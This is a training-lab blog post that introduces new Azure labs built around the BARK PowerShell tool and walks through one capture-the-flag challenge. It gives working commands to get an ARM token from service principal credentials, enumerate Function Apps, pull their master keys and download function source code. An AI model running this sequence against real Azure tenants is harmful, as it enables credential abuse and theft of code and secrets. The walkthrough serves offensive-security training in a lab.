Calling One RESTful API at a time using BARK Tool (Update to Red Labs Platform)

Hitesh Duseja
52 minutes ago
3 min read

Hello Readers,

Today, we are going to discuss the launch of new category of labs on our very own community favorite Red Labs platform, with a focus on using the BARK tool.

So, without further ado, let’s get started with it.

The first question we must address is this: What exactly is BARK?

BARK stands for BloodHound Attack Research Kit. It is authored by Andy Robbins, from SpecterOps, who is also one of the creators of the famous BloodHound Tool for Active Directory pen testing. The UVP of BARK is that it is a standalone PowerShell Script that can be used to interact with various Azure Services. BARK’s design is very modular, meaning it as a tool, is easily maintainable as almost all functions are self-contained since they are nothing but wrappers around REST API Call to Azure Endpoints.

With the basics clear, let’s steer the blog post discussion towards the new labs.

In all the 10 new labs, the aim is to to attack multiple services in Azure using BARK. Apart from that, in a few labs, we are also encouraging our users to use PowerShell’s Invoke-RestMethod to perform native or raw API Calls to interact with the Azure Endpoints for enumeration purposes. With this, we try to make the labs experience much more coherent and helpful for our community in learning offensive Azure tactics.

Now, with all this background, let’s solve one of the labs. The reader is free to follow along.

Please login to https://redlabs.enterprisesecurity.io and use the search bar to find "Function App" Or "BARK"

Find Challenge 7. The challenge asks for the flag from the Function App source code via the Service Principal login.

What is Function App? - Azure Function App is a serverless compute service in Azure that hosts one or more individual functions which are small, event-driven code units, meaning they are kind of reactive. When any event occurs or condition is satisfied, they are executed. Languages supported are C#, Python, PowerShell, JavaScript, Java etc.

Fire up the lab and wait for your credentials.
Download the BARK script from GitHub by cloning the BARK repository. Navigate to the BARK directory, where the BARK.ps1 script is located. Import the BARK script into the current PowerShell session so you can access its functions.

git clone https://github.com/BloodHoundAD/BARK

Import-Module "$pwd\BARK\BARK.ps1"

Note: In case, git is not installed on the system then the user can follow the steps below to download, extract and import BARK into the current PowerShell Session.

$presentworkingdirectory = pwd
$presentworkingdirectory

$downloadfile = Join-Path $presentworkingdirectory "BARK.zip"
$downloadfile

Invoke-WebRequest -UseBasicParsing -Uri 'https://github.com/BloodHoundAD/BARK/archive/refs/heads/main.zip' -OutFile $downloadfile

Expand-Archive $downloadfile -DestinationPath $presentworkingdirectory
$ps1path = Join-Path $presentworkingdirectory "BARK-main\BARK.ps1"
$ps1path

Import-Module $ps1path

In PowerShell, assign provided credentials in variables.

$tenantdomain = '<AZUREENTRADOMAIN.COM>'

$clientid = '<CLIENTID>'

$clientsecret = '<CLIENTPASSWORD>'

Using BARK, get the ARM Token via the Service Principal credentials.

$atok = (Get-AzureRMTokenWithClientCredentials -ClientID $clientid -ClientSecret $clientsecret -TenantName $tenantdomain)."access_token"

$subs = (Get-AllAzureRMSubscriptions -Token $atok)."subscriptionId"

As the challenge title hints about FunctionApp, let’s enumerate the required details.

$allfunctionapp = Get-AllAzureRMFunctionApps -Token $atok -SubscriptionID $subs
$allfunctionapp

$functionappid = 'https://management.azure.com' + $allfunctionapp.id
$functionappid

Then as per given challenge scenario, let's get the download path of function app function source code file.

$functionappfuncs = Get-AzureFunctionAppFunctions -Token $atok -PathToFunctionApp $functionappid

$functionappfuncs
$functionappfuncs.properties.script_href

To download the source code file, we need the master key of the Function App, so let's get that to download the function.

$functionappmkey = Get-AzureFunctionAppMasterKeys -Token $atok -PathToFunctionApp $functionappid

$pwd = pwd

$headers = @{
"x-functions-key" = $functionappmkey
}

It’s time to use Sysinternals strings64.exe to find the flag in the downloaded source code.

$presentworkingdirectory = pwd
$presentworkingdirectory

[System.IO.File]::WriteAllBytes("$presentworkingdirectory\<FUNCTION_NAME_FILE.EXTENSION>",(Invoke-WebRequest -Headers $headers $functionappfuncs.properties.script_href).Content)

Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Strings.zip" -OutFile "Strings.zip"

Expand-Archive "Strings.zip" -DestinationPath $presentworkingdirectory -Force

$stringsfile = Join-Path -Path $presentworkingdirectory -ChildPath "strings.exe"

$flagsearch = Invoke-Expression "$stringsfile -accepteula <FUNCTION_NAME_FILE.EXTENSION>"

$flagsearch | Select-String -Pattern "flag"

Submit the flag and complete the challenge.

Hooray, We have successfully solved Challenge 7. Want to try the challenge? Please logon to https://redlabs.enterprisesecurity.io/ and enjoy the lab.

Thank you for reading !! Cheers !!

References:

- Function App Abuse: https://xmcyber.com/blog/10-ways-to-gain-control-over-azure-function-app-sites

- MS DOCS: https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth-ropc

Posted by:

Hitesh Duseja

Security Researcher at AlteredSecurity